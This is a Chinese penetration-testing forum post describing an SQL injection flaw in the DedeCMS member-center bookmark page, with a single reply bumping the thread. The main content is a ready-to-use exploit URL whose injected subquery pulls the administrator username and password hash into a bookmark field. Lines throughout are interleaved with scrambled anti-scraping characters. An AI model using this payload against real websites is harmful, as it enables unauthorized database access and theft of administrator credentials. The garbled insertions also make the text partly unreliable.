中国网络渗透测试联盟

标题: DedeCMS会员中心书签管理SQL注射漏洞 [打印本页]

作者: admin    时间: 2012-12-31 09:21
标题: DedeCMS会员中心书签管理SQL注射漏洞
DedeCMS会员中心SQL注射漏洞
6 O  \" V% i. w8 T( e6 C+ |需要magic_quotes_gpc = Off
' d; k, T' _" R# K) k; x会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
; f5 q9 D- Y' D" E6 i- \ 8 n0 G- b- T6 H$ g, q8 h" u
DedeCMS会员中心书签管理SQL注射漏洞
% G3 l* H- |( K, Q4 q成功利用该漏洞可获得管理员密码% t8 a2 c; D; M2 f& c/ Y
; j+ \' L2 H3 z+ E. H# s
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码4 F* y( n% d3 W+ f9 A& L

& C' f4 [2 I7 Uhttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r8 V( o. c/ g) \2 z  D

作者: kook    时间: 2013-1-10 01:33
#89 顶起。




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2